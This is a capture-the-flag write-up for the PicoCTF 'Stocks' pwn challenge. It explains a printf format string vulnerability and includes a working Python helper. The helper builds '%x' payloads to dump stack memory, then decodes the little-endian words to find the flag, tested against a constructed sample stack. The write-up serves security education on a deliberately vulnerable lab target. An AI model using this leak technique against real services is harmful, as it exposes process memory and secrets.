PicoCTF - Stocks [Pwn]

Stocks is a very easy pwn challenge from PicoCTF.

Instead of providing a binary file, as most pwn challenges do, Stocks directly provides the source code of the program to be exploited remotely.

Analyzing the code, it is possible to notice two interesting things:

  • Inside a function there is an array of chars, called api_buf, of fixed length FLAG_BUFFER=128, that may contain the flag:
api_buf[FLAG_BUFFER]
  • A format string vulnerability: the user's input is used directly as the format string of a printf-family call, so any conversion specifiers it contains are interpreted.

By exploiting the format string vulnerability, sending a large number of “%x” specifiers as input, it is possible to dump the content of the stack: each “%x” consumes the next argument slot and prints it as a hexadecimal number, so a long enough chain walks down the stack and therefore also through the content of the api_buf array, which is a local variable of the function. A caveat for 64-bit targets: in practice “%x” prints only the low 32 bits of each 8-byte slot, so “%lx” or “%p” gives complete words there.

Exploit

Once the content of the stack has been retrieved, assuming that the content of the api_buf array is made of printable characters, it is possible to look for consecutive bytes with values between 0x20 and 0x7e. After finding such a sequence, it can be translated into characters keeping in mind that the target is little-endian: within each leaked word the least significant byte sits at the lowest address, so it appears in the rightmost position of the printed hexadecimal value and the bytes of every word have to be reversed before concatenating them. Note also that “%x” suppresses leading zeros, so each word has to be padded back to its full width before reversing it.
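The payload construction from the previous section and the decoding described here, as an added worked example that is not part of the original write-up. It assumes a 32-bit little-endian target (one 4-byte word per “%x”) and a “.” separator between specifiers; the stack dump it decodes is constructed inline, not captured from the challenge, and the flag inside it is a placeholder. It goes slightly beyond the text by restoring the leading zeros that “%x” drops, which a naive byte-reversal of the printed digits would get wrong.

```python
from __future__ import annotations

import re
import struct

# Assumption: a 32-bit little-endian target, so every "%x" leaks one 4-byte
# stack slot.  On x86-64 use "%lx" in the payload and WORD_SIZE = 8.
WORD_SIZE = 4
SEP = "."


def build_payload(n_words: int) -> bytes:
    """Each "%x" consumes the next argument slot, so N of them dump N words."""
    return (("%x" + SEP) * n_words).encode()


def parse_dump(output: str) -> list[int]:
    """Recover the integer words from the program's printf output."""
    return [int(tok, 16) for tok in output.split(SEP)
            if re.fullmatch(r"[0-9a-f]+", tok)]


def words_to_bytes(words: list[int], word_size: int = WORD_SIZE) -> bytes:
    """Little-endian: repack each word so its least significant byte comes
    first.  struct.pack also restores the leading zeros "%x" stripped."""
    fmt = "<I" if word_size == 4 else "<Q"
    return b"".join(struct.pack(fmt, w) for w in words)


def printable_runs(data: bytes, min_len: int = 8) -> list[bytes]:
    """Runs of bytes in 0x20..0x7e, the range the write-up scans for."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


def find_flag(output: str) -> bytes | None:
    """Scan every printable run of the repacked stack for a picoCTF{...} token."""
    for run in printable_runs(words_to_bytes(parse_dump(output))):
        m = re.search(rb"picoCTF\{[^}]*\}", run)
        if m:
            return m.group(0)
    return None


def simulate_leak(stack: bytes) -> str:
    """Stand-in for the remote program: render a byte blob the way "%x." would
    (lowercase, no leading zeros).  Used only to build the constructed sample."""
    padded = stack + b"\0" * (-len(stack) % WORD_SIZE)
    words = struct.unpack("<%dI" % (len(padded) // WORD_SIZE), padded)
    return "".join("%x%s" % (w, SEP) for w in words)


# Constructed stack image (not from the challenge): a few noise words, the
# api_buf contents with a placeholder flag, then more noise words.
SAMPLE_STACK = (
    struct.pack("<IIII", 0x804A0C0, 0x1, 0xFFFFD5E4, 0x0)
    + b"picoCTF{this_is_a_constructed_flag}\0"
    + struct.pack("<II", 0xF7FB5000, 0x8049302)
)
SAMPLE_OUTPUT = simulate_leak(SAMPLE_STACK)

if __name__ == "__main__":
    print(build_payload(4))       # what would be sent to the program
    print(SAMPLE_OUTPUT)          # what the program would print back
    print(find_flag(SAMPLE_OUTPUT))
```

Against the real service the same functions apply: send `build_payload(n)` for a large n, feed the returned text to `find_flag`, and raise n if no printable run long enough appears. Input size limits on the vulnerable read bound how many words one payload can leak.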

Once translated, the sequence of characters reveals the flag:

Flag

Pwned!

WhiteSnake

MSc in CyberSecurity at Politecnico di Milano and eJPT Junior Penetration Tester